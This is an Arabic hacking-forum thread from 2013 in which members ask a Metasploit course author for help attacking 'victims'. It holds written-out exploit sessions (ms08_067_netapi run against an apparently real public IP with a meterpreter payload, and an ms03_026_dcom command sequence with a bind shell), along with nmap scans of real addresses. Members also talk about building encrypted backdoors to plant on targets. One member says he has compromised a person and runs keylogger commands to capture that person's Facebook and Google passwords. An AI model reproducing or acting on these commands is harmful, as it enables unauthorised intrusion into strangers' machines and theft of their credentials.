المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [[[[[[[ حل باب الاستفسارات بخصوص الميتاسبلويت ]]]]]]]]



aymen cyril kamar
03-19-2013, 01:33 PM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله وبركاته

بما انو أصبح صعب علي تتبع كل استفسارات و مشاكل بما يخص الميتاسبلويت و كثرة الرسائل الخاصة بما يخص الدورة ... الخ

قررت ان افتح باب للاستفسارات بما يخص الميتاسبلويت و ليس فقط ما يخص دورتي بل كل من له مشكلة فليتقدم بها هنا انشاء الله راح تنحل المشلكة + قابل

حتى المساعدات الكبيرة...

ممنوع :
1-طلبات الاختراق ...
2- واحد يققولي حاب نتعلم الميتاسبلويت
3- المهم كما في قوانين القسم

انشاء الله راح تكون فكرتي في محلها و سأساعد المحتاج

-----------------------------------
انتهى و الحد لله
أخوكم Aymen_Cyril_Kamar

xbey
03-20-2013, 08:19 PM
يشرفني انا يكون اول رد لي ^^.................. حبيت اسالك
هو الميتا هل فيها ثغرات لتهكيير الباك تراك ؟ ولا مستحييل تهكيير الباك تراك ؟

aymen cyril kamar
03-20-2013, 08:28 PM
مشكور حبيبي سؤال في محلو
و انا اقول انو لا شئ مستحيل بل سهل جدا اختراق الباك تراك و يعتمد على الهندسة الاجتماعية هخهخ يعني اسلوب لكي تقنع الضحية
و يعتمد ايضا على ملف بي اتش بي يتم تشغيله من قبل الضحية يشبه الباكدور لاكنه بانتداد البي اتش بي
و سنلجأ ذالك في الدروس القادمة انشاء الله
بالتوفيق.......

shhaby
03-20-2013, 08:38 PM
بارك الله فيك اخ ايمن على المجهود الذي تريد ان تبذله للاخوان في المنتدى . حول الميتاسبلويت . بالتوفيق يا مبدع هخهخهخ هذة الضحكة مالتك

xbey
03-20-2013, 09:14 PM
مشكور حبيبي سؤال في محلو
و انا اقول انو لا شئ مستحيل بل سهل جدا اختراق الباك تراك و يعتمد على الهندسة الاجتماعية هخهخ يعني اسلوب لكي تقنع الضحية
و يعتمد ايضا على ملف بي اتش بي يتم تشغيله من قبل الضحية يشبه الباكدور لاكنه بانتداد البي اتش بي
و سنلجأ ذالك في الدروس القادمة انشاء الله
بالتوفيق.......
ان شاء الله .....
وكمان سؤال اخر مين وين احصل الثغرات ؟؟

- - - تم التحديث - - -

وهل لما تهكر احد قافل الدوس تسويله شي ؟

aymen cyril kamar
03-20-2013, 09:32 PM
أخي انت تقصد منين أحصل على الثغرات كثيرا ما تجد في مواقع السكيورتي exploit-db هاذا على حسب فهمي للسؤال
و ان كنت تقصد كيف اعرف الثغرات في جهاز الضحية فيتم على طريق nmap فهي تعطيلك البورتات المفتوحة في الجهز و كل بورت و له ثغرت خاصة
لرئية الثغرات الخاص و التي يختويها الميتاسبليوت اكتب show exploits
2- و ما دخل الدوس يكون قافل حال ما عندو دخل
*----------------------
لا شكر عهلى واجب اخي shaby تحياتي هخهخهخهخهخهخهخهخههههههههه هههههههههه

xbey
03-20-2013, 10:16 PM
أخي انت تقصد منين أحصل على الثغرات كثيرا ما تجد في مواقع السكيورتي exploit-db هاذا على حسب فهمي للسؤال
و ان كنت تقصد كيف اعرف الثغرات في جهاز الضحية فيتم على طريق nmap فهي تعطيلك البورتات المفتوحة في الجهز و كل بورت و له ثغرت خاصة
لرئية الثغرات الخاص و التي يختويها الميتاسبليوت اكتب show exploits
2- و ما دخل الدوس يكون قافل حال ما عندو دخل
*----------------------
لا شكر عهلى واجب اخي shaby تحياتي هخهخهخهخهخهخهخهخههههههههه هههههههههه
كان قصدي اذا الضحية فاقل الدوس ماتقدر تسوليه شي صح ؟

aymen cyril kamar
03-20-2013, 11:34 PM
ما معنى فاقل ؟؟؟؟؟

sparo
03-21-2013, 01:21 AM
ما معنى فاقل ؟؟؟؟؟

ههههههه يقصد قافل ...!!! تحياتي وننتظر الجديد من دورة الميتا لطرح الاستفسارات اذا لزمنا تحياتي على الابداع المتواصل ايمن ..

aymen cyril kamar
03-21-2013, 01:28 AM
مشكور حبيب على رأيك تقبل مروري
النسبة لدوس ماله دخل
بالتوفيق...

xbey
03-21-2013, 12:19 PM
ههههههه يقصد قافل ...!!! تحياتي وننتظر الجديد من دورة الميتا لطرح الاستفسارات اذا لزمنا تحياتي على الابداع المتواصل ايمن ..

ههههههههههههههه يسلموا على التصحيح

MrKbrit
03-21-2013, 02:54 PM
رد على الرسايل

MJNONFIK
03-21-2013, 03:52 PM
^^^

ردك مكانه غلط :]

dark prince
03-21-2013, 07:35 PM
اخي انا فتحت البورت 4444 في الباك تراك
وفتحت البورت بجدار الحماية
والفيروتشل نيتورك
وعطيت الباك تراك ايبي حقيقي
وفتحت البورت بل رواتر
وفعلت ال dmz

ولكن هذا الخطأ مسمتر عندي



msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 31.9.136.7
LHOST => 31.9.136.7
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > set RHOST 31.9.229.181
RHOST => 31.9.229.181
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
Exploit running as background job.
Started bind handler
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (31.9.229.181:445)

وانا جربت غير ثغرة
وجربت عل ارميتاج
وجربت عل ميتاسبلوت بدون الوجهة الرسومية
ولكن الخطأ اسمتر

واداة nmap
ماعم تفحص الايبي وعم تعطي هي النتيجة دايما
ممكن اعرف المشكلة وين بل ضبط ﻷحلها
وهذا الخطأ تبع ال nmap

nmap -O 31.9.216.80

Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:34 EET
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.58 seconds

aymen cyril kamar
03-21-2013, 07:40 PM
اخي انا فتحت البورت 4444 في الباك تراك
وفتحت البورت بجدار الحماية
والفيروتشل نيتورك
وعطيت الباك تراك ايبي حقيقي
وفتحت البورت بل رواتر
وفعلت ال dmz

ولكن هذا الخطأ مسمتر عندي


msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 31.9.136.7
LHOST => 31.9.136.7
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > set RHOST 31.9.229.181
RHOST => 31.9.229.181
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
Exploit running as background job.
Started bind handler
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (31.9.229.181:445)


واداة nmap
ماعم تفحص الايبي وعم تعطي هي النتيجة دايما
ممكن اعرف المشكلة وين بل ضبط ﻷحلها
وهذا الخطأ تبع ال nmap

nmap -O 31.9.216.80

Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:34 EET
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.58 seconds


المهم حبيبي انا راح أشرح لك

اولا عند استعمال البايلاد استعمل reverse_tcp اوكي هاذي اول شئ
و يعود عدم وجود الضحية الى الاسباب التالية
انك مو عامل brideg في الماشين المهم
او يكون البورت 455 مرقع عند الضحية ...
يكون الفيروول عندك او عند الضحية شغال
انا انصحك حبيبي لتفادي كل هذه المششاكل استعمل الميتاسبلويت في الوندوز مثلي و ريح حالك
تحياتي بخصوص النماب افحص كاتالي افضل بالامر
db_nmap xxx.xxx.xxx.xxx
أو nmap -s xxx.xxx.xxx.xxx
$المهم هناك اوامر كثيرة
بالتوفيق...........

dark prince
03-21-2013, 07:52 PM
اخي انا بدي اتعلم الباك تراك لهك بديها تزبط معي بل باك تراك اخي
في فيديو بيشرح العملية الي عم تحكي عنها من اولها ﻷخرها
و الdb_nmap الامر الي عطيتني ماشتغل عطاني الامر غير موجود
والامر التاني nmap -s
عطاني هيكnmap -S 31.9.145.9
WARNING: If -S is being used to fake your source address, you may also have to use -e <interface> and -Pn . If you are using it to specify your real source address, you can ignore this warning.

Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-21 18:48 EET
Could not figure out what device to send the packet out on with the source address you gave me! If you are trying to sp00f your scan, this is normal, just give the -e eth0 or -e ppp0 or whatever. Otherwise you can still use -e, but I find it kindof fishy.
QUITTING!
اخي بعرف عم عذبك معي
بس البورت فتح وماعم يزبط معي الاستغلال ليش ماعم اعرف
وعامل بريدج بل مشاين كلو تمام

aymen cyril kamar
03-22-2013, 03:26 PM
يلزمك قاعدة بيانات حيببيبي
انشاء االه راح أشرح الشغلة في الدروس القادمة

sparo
03-22-2013, 05:11 PM
سلامات يا ايمن الغالي كان عندي استفسار بخصوص الدرس الخامس لصناعة الباكدور وتشفيره انو انا مشيت معك بالدرس بس وين بدي الاقي الباكدور مشان ارفعه على شي موقع ما عم اعرف وين الباكدور ..؟؟؟

dark prince
03-22-2013, 11:50 PM
سلامات يا ايمن الغالي كان عندي استفسار بخصوص الدرس الخامس لصناعة الباكدور وتشفيره انو انا مشيت معك بالدرس بس وين بدي الاقي الباكدور مشان ارفعه على شي موقع ما عم اعرف وين الباكدور ..؟؟؟

اخي حسب الشرح انت بتحدد مكان حفظ الباكدور من الخيار الاول output path
من هون بتحدد مكان حفظ الباك دور
ارجو ان اكون قد افدتك
واعتذر من الاخ ايمن على تدخلي
طبعاً الاخ ايمن الو فضل كبير علي وانا بقدرو وبشكرو

aymen cyril kamar
03-23-2013, 12:03 AM
اخي حسب الشرح انت بتحدد مكان حفظ الباكدور من الخيار الاول output path
من هون بتحدد مكان حفظ الباك دور
ارجو ان اكون قد افدتك
واعتذر من الاخ ايمن على تدخلي
طبعاً الاخ ايمن الو فضل كبير علي وانا بقدرو وبشكرو
مشكور حبيبي و لا داعي للاعتذار
بل تستحق الشكر لمساعدتي
تحياتي

sparo
03-23-2013, 02:00 AM
فهمان عليك بس انا حاولت اغير المسار ما يقبل الا على برنامج او على صورة يعني الباكدور بيزل بصورة او ببرنامج ولا كيف ؟؟

- - - تم التحديث - - -

فهمان عليك بس انا حاولت اغير المسار ما يقبل الا على برنامج او على صورة يعني الباكدور بيزل بصورة او ببرنامج ولا كيف ؟؟

- - - تم التحديث - - -

ااااه وصلت المعلومة لقيتها شباب لا تواخذوني تحياتي ...
************

dark prince
03-23-2013, 02:57 AM
الحمد الله انو تم حل مشكلتك
وانشا الله تقدر تفيد غيرك اذا واجهتو نفس المشكلة

aymen cyril kamar
03-23-2013, 12:09 PM
حبيبي من دون اكثار او قلق او أي شئ راقب الدرس الخامس من الزء الثاني و هو نفسه التطبيق على الويندوز مع التطبيق على اللينيكس وهو مفيد جدا جدا جدا جدا ...
بالتوفيق..........

Mr.JnOoN
03-23-2013, 01:23 PM
شكرآ لك
مساهمة طيبة من شخص اكثر طيبة وابدااااع
تستاهل التقييم
**************
بدي تعلمني الميتا هههههههههههههخهخهخهخ
بمزح حب واصل بلا فوااااصل

DoomRocket
03-26-2013, 12:10 AM
السلام عليكم

كنت أتعلم الاختراق بالميتاسبلويت و أغلب الدروس كانت بالثغرة windows/smb/ms08_067_netapi على البورت 445 لكن للأسف لم أستطع ايجاد ضحية مفتوح عنده البورت 445 لتحميل الثغرة و حتى الضحايا التي وجدتها كان عندها Windows 7 أو Windows مش عارف للأسف لغتها كانت بالانجليزية و أنا لغة الWindows XP Pack 3 هي French و في بعض الأحيان يقولي الميتا Lang.:Unknown لذلك رجاءا لو ممكن مساعده أو لو ممكن شروحات عن البورت 80 لأن أغلب الضحايا عندها البورت 80 مفتوحة أو البروت 135 أو 21 ...الخ أو رجاءا لو ممكن أسطوانة لتعليم الميتا من الصفر بالنسخة الجديد للميتا


=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1068 exploits - 671 auxiliary - 179 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

شكرا على المساعده

aymen cyril kamar
03-26-2013, 12:28 AM
أخي على العموم كل مستعملي ويندوز اكس بي يوجد عندهم البورت 445 مفتوح
الطريقة الوحيدة للحل من المشاكل هي db__autopwn سأشرحها انشاء الله شرح جيد
تحياتي

DoomRocket
03-26-2013, 12:54 AM
أخي على العموم كل مستعملي ويندوز اكس بي يوجد عندهم البورت 445 مفتوح
الطريقة الوحيدة للحل من المشاكل هي db__autopwn سأشرحها انشاء الله شرح جيد
تحياتي

شكرا على الرد و بارك الله فيك لكن أنا ما عندي البورت 445 مفتوح عملت فحص بالNmap على أيبي الخاص بي و لم أجد البورت 445 مفتوح وجدت 3 بورتات مفتوحه فقط 21 . 80 و أظن البورت 23 لست أتذكر جيدا

aymen cyril kamar
03-26-2013, 01:17 AM
جرب في هاذا الموقع :
canyouseeme.org
افحص البورت 445
و البورت 139
و رد بالخبر

كاسر المشاعر
03-31-2013, 03:25 PM
الله يعطيك العافية يا غالي.....

sohayl111
03-31-2013, 09:15 PM
بارك الله فيك

xbey
04-06-2013, 12:26 AM
السلام عليكم

كنت أتعلم الاختراق بالميتاسبلويت و أغلب الدروس كانت بالثغرة windows/smb/ms08_067_netapi على البورت 445 لكن للأسف لم أستطع ايجاد ضحية مفتوح عنده البورت 445 لتحميل الثغرة و حتى الضحايا التي وجدتها كان عندها Windows 7 أو Windows مش عارف للأسف لغتها كانت بالانجليزية و أنا لغة الWindows XP Pack 3 هي French و في بعض الأحيان يقولي الميتا Lang.:Unknown لذلك رجاءا لو ممكن مساعده أو لو ممكن شروحات عن البورت 80 لأن أغلب الضحايا عندها البورت 80 مفتوحة أو البروت 135 أو 21 ...الخ أو رجاءا لو ممكن أسطوانة لتعليم الميتا من الصفر بالنسخة الجديد للميتا


=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1068 exploits - 671 auxiliary - 179 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

شكرا على المساعده
ذي مشان بورت 135

msf>search dcom
msf>use exploit/windows/dcerpc/ms03_026_dcom
show options
set RHOST xxx.xxx.xx.xx
set PAYLOAD windows/shell_bind_tcp
exploit

مكان الاكس اي بي الضحية وتقدر تستعمل بايلود اخر

Elhadj-Dz
04-15-2013, 10:08 AM
إشكالية من خلال التعديل على البايلود

jaroud007
04-21-2013, 07:53 PM
ممكن اومر استخراج باسوورد الضحية بالميتا سبلويت.
انا مخترق واحد بالميتا واستطيع ان اشاهد سطح مكتبه وغيرها .

المهم اريد ذريقة استخراج الباسووردات للضحية..

يان اشاهده يدخل لحسابته في مواقع مختليف مثل الفيسبوك و عوغل.

واستعملت هده الاوامر

run keylogrecorder

keyscan_start

keyscan_dump

هي تقوم بتسجيل مادا يكتب الضحية لكن لا احصل على الايميل + البلاسوورد.


ممكن طريقة ولكن احلى تقيييم.

toxino
04-23-2013, 02:43 PM
اخي ايمن انا من الجزائر استطيع الى الدخول الى رواتري بس ما عرفت افتح بورت 4444

- - - تم التحديث - - -

ممكن المساعدة يا ايمن http://www.aljyyosh.com/vb/showthread.php?t=47326&p=520818#post520818 ادخل وحللي المشكل

الفاشل العام
04-24-2013, 02:04 PM
السلام عليكم شباب
شباب انا بعدي ع الميتا حملت الاصدار الاخير من موقعو الرسمي لكن في مشكله وهي عدم وجود الارميتاج هل النخسة الجديدة تختلف؟ او اللي بيقولو عن الميتا تكون مجانيه فقط ع الباك تراك ومفوعه ع الويندوز
وشكرا

غسان الميري
04-25-2013, 10:19 PM
السلام عليكم ورحمة الله وبركاته

اخي بعد تنصيب الميتاسبلويت لم اجد هذه الاداة msfgui

ممكن مساعده واكون ممنون

xbey
04-25-2013, 11:43 PM
السلام عليكم ورحمة الله وبركاته

اخي بعد تنصيب الميتاسبلويت لم اجد هذه الاداة msfgui

ممكن مساعده واكون ممنون
جرب الميتاسبلوت تبع الباك تراك احسن والله

غسان الميري
04-26-2013, 12:33 PM
جرب الميتاسبلوت تبع الباك تراك احسن والله

والله يا اخي الباك تراك صعب مع العلم انا منصب الاداة وجاهز بس صعب

T-K.Avenger
04-26-2013, 04:53 PM
مرحبا أخي
لو سمحت بدي شرح للاختراق الداخلي والخارجي وما الفرق بينهما
لو فحصت آي بي الضحية وما كان عنده بورت 445 مفتوح كيف بقدر اخترقه بالميتاسبلويت
وشكراً

اخوك: Dark|Devil

غسان الميري
04-26-2013, 09:41 PM
السلام عليكم شباب
شباب انا بعدي ع الميتا حملت الاصدار الاخير من موقعو الرسمي لكن في مشكله وهي عدم وجود الارميتاج هل النخسة الجديدة تختلف؟ او اللي بيقولو عن الميتا تكون مجانيه فقط ع الباك تراك ومفوعه ع الويندوز
وشكرا
نفس المشكله حملت اصدار تاني ونجح الامر
metasploit-latest-windows-installer_3.exe

xbey
04-27-2013, 01:03 AM
مرحبا أخي
لو سمحت بدي شرح للاختراق الداخلي والخارجي وما الفرق بينهما
لو فحصت آي بي الضحية وما كان عنده بورت 445 مفتوح كيف بقدر اخترقه بالميتاسبلويت
وشكراً

اخوك: Dark|Devil

اذا ماعنده 445 تقدر تستعمل ثغرات المتصفح

abou hicham
08-02-2013, 07:42 AM
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل
شكرا جزيلا أخي الفاضل